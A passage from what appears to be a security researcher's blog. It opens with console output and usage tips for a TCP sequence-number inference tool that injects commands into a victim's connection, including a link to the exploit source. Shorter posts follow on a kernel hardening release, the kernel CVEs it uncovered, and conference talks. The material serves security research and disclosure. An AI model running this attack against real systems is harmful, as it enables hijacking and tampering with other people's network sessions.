       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535

        [!!] SQN => 1874825280, with seq_offset => 65535

        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
        [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1

        [!!] Real server’s SQN => 1874821505

        [+] Finish! check whether command was injected (should be :))

        [!] Next SQN [1874822706]

real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

  • Sometimes you can see that tool is spinning around the same value when trying to find “server’s real SQN”. If next to the number in the parentheses you see number 1, kill the attack, copy calculated SQN (the one around which value tool was spinning) and paste it as an SQN start parameter (-M). It should fix that edge case.
  • Sometimes you can encounter the problem that scanning by 64KB window size can ‘overjump’ the appropriate SQN brackets. You might want to reduce the window size to be smaller. However, tools should change the window size automatically if it finishes scanning the full SQN range with current window size and didn’t find the correct value. Nevertheless, it takes time. You might want to start scanning with the smaller window size (but that implies longer attack).
  • By default, tool sends ICMP message to the victim’s machine to read IP_ID. However, I’ve implemented functionality that it can read that field from any IP packet. It sends standard SYN packet and waits for reply to extract IP_ID. Please give an appropriate TCP port to appropriate parameter (-P)

Tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor IP_ID in specific session, you can see it is just incremented per each sent packet. However, each session has independent IP_ID base.

Happy hacking,
Adam

LKRG 0.9.0 has been released!

12 April 2021 at 21:54
By: pi3

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

  • Deadlock issue which was not really addressed and devs said they will take a look and there is not much updates on that.
  • Problem with the code related to hwlatd kernel thread – it is incorrectly synchronizing with launcher / killer of it. You can have WARN in kernels all the time.

CVE-2021-3411 refers to 2 different type of bugs:

  • Broken KRETPROBE (recently reported)
  • Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug with the kernel signal handling in dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG so I’m not counting it here (otherwise it would be total 8 bugs while 5 of them would have CVE).

That’s pretty bad stats… However, it might be an interesting story to say during LKRG announcement of the new version. It could be also interesting talk for conference.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

My talks @ BlackHat 2021 and DefCon29

3 July 2021 at 20:59
By: pi3

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

  • There are no more articles
❌